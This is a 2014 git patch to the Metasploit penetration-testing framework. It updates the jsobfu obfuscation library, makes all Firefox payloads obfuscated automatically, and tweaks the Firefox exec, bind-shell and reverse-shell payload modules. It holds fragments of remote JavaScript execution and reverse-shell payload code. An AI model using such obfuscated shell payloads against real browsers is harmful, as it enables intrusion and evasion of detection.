From b96a7ed1d048d0089e738fdbabb041522347b398 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joe_vennix@rapid7.com>
Date: Wed, 24 Sep 2014 16:05:00 -0500
Subject: [PATCH] Install a global object in firefox payloads, bump jsobfu.

---
 Gemfile.lock                                  |  4 ++--
 .../remote/firefox_privilege_escalation.rb    |  1 +
 lib/msf/core/payload/firefox.rb               | 21 +++++++++++--------
 metasploit-framework.gemspec                  |  2 +-
 modules/payloads/singles/firefox/exec.rb      |  1 +
 .../singles/firefox/shell_bind_tcp.rb         |  1 +
 .../singles/firefox/shell_reverse_tcp.rb      |  2 ++
 7 files changed, 20 insertions(+), 12 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index ed2e935cf6..87772d454d 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -5,7 +5,7 @@ PATH
       actionpack (< 4.0.0)
       activesupport (>= 3.0.0, < 4.0.0)
       bcrypt
-      jsobfu (~> 0.1.7)
+      jsobfu (~> 0.2.0)
       json
       metasploit-concern (~> 0.2.1)
       metasploit-model (~> 0.27.1)
@@ -91,7 +91,7 @@ GEM
     hike (1.2.3)
     i18n (0.6.11)
     journey (1.0.4)
-    jsobfu (0.1.7)
+    jsobfu (0.2.0)
       rkelly-remix (= 0.0.6)
     json (1.8.1)
     mail (2.5.4)
diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
index 2ce211a679..000327bbfc 100644
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@@ -12,6 +12,7 @@ require 'msf/core/exploit/jsobfu'
 module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation
 
+  # automatically obfuscate anything that runs through `js_exec`
   include Msf::Exploit::JSObfu
 
   # Sends the +js+ code to the remote session, which executes it in Firefox's
diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index 3703b391eb..2d116ca0d4 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -1,9 +1,13 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 require 'json'
 
 module Msf::Payload::Firefox
 
+  # automatically obfuscate every Firefox payload
+  include Msf::Exploit::JSObfu
+
   # Javascript source code of setTimeout(fn, delay)
   # @return [String] javascript source code that exposes the setTimeout(fn, delay) method
   def set_timeout_source
@@ -121,16 +125,15 @@ module Msf::Payload::Firefox
           var retVal = null;
 
           try {
-            retVal = Function(js[1]).call({
-              send: function(r){
-                if (sent) return;
-                sent = true;
-                if (r) {
-                  if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
-                  else      cb(false, r+tag+"\\n");
-                }
+            this.send = function(r){
+              if (sent) return;
+              sent = true;
+              if (r) {
+                if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
+                else      cb(false, r+tag+"\\n");
               }
-            });
+            };
+            retVal = Function(js[1]).call(this);
           } catch (e) { retVal = e.message; }
 
           sync = false;
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 3f1fd9b334..9217019719 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
   spec.add_runtime_dependency 'bcrypt'
   # Needed for Javascript obfuscation
-  spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
+  spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks
diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb
index 7c9b7afc9b..0487ed87e2 100644
--- a/modules/payloads/singles/firefox/exec.rb
+++ b/modules/payloads/singles/firefox/exec.rb
@@ -34,6 +34,7 @@ module Metasploit3
     <<-EOS
 
       (function(){
+        window = this;
         #{read_file_source if datastore['WSCRIPT']}
         #{run_cmd_source if datastore['WSCRIPT']}
 
diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb
index 377c25a624..115755b92e 100644
--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -34,6 +34,7 @@ module Metasploit3
   def generate
     %Q|
     (function(){
+      window = this;
       Components.utils.import("resource://gre/modules/NetUtil.jsm");
       var lport = #{datastore["LPORT"]};
       var rhost = "#{datastore['RHOST']}";
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
index e3a8d572fe..22fc3a6327 100644
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -32,6 +32,8 @@ module Metasploit3
     <<-EOS
 
       (function(){
+        window = this;
+
         Components.utils.import("resource://gre/modules/NetUtil.jsm");
         var host = '#{datastore["LHOST"]}';
         var port = #{datastore["LPORT"]};